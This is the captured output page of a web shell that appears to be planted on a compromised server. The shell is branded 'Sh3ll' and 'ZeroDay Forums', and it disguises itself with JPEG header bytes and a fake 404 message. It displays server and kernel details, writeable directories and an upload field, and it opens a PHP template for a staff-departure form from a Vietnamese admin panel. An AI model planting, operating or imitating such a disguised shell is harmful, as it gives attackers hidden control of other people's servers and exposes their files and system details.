����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/admin.adimi/code/management/staff/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //var/www/html/admin.adimi/code/management/staff/quit_job_tpl.php
<div class="card">
    <div class="card-header">
        Cập nhật nghỉ công tác
    </div>
    <div class="card-body">
        <form action="index.php?act=management&code=staff&type=quit_job" method="POST" id="form_action">
            <input name="list_id" value="<?php echo $txt_list_id;?>" type="hidden">
            <table class="table table-bordered color-table info-table">
                <?php echo $html_form;?>
            </table>
            <div class="justify-content-center" style="margin-top: 10px; text-align: center;">
                <input type="submit" value="<?php echo $lang['cap-nhat'];?>" name="submitbt_out_work" class="btn btn-primary">
            </div>
        </form>
    </div>
</div>

<div class="card">
    <div class="card-header">
        Sự kiện đã cập nhật
    </div>
    <div class="card-body">
        <table class="table table-bordered">
            <tr><th>Loại</th><th>Ngày</th><th>Lý do/Ghi chú</th><th>Người nhập</th><th>#</th></tr>
            <?php echo $html_show;?>
        </table>
    </div>
</div>

ZeroDay Forums Mini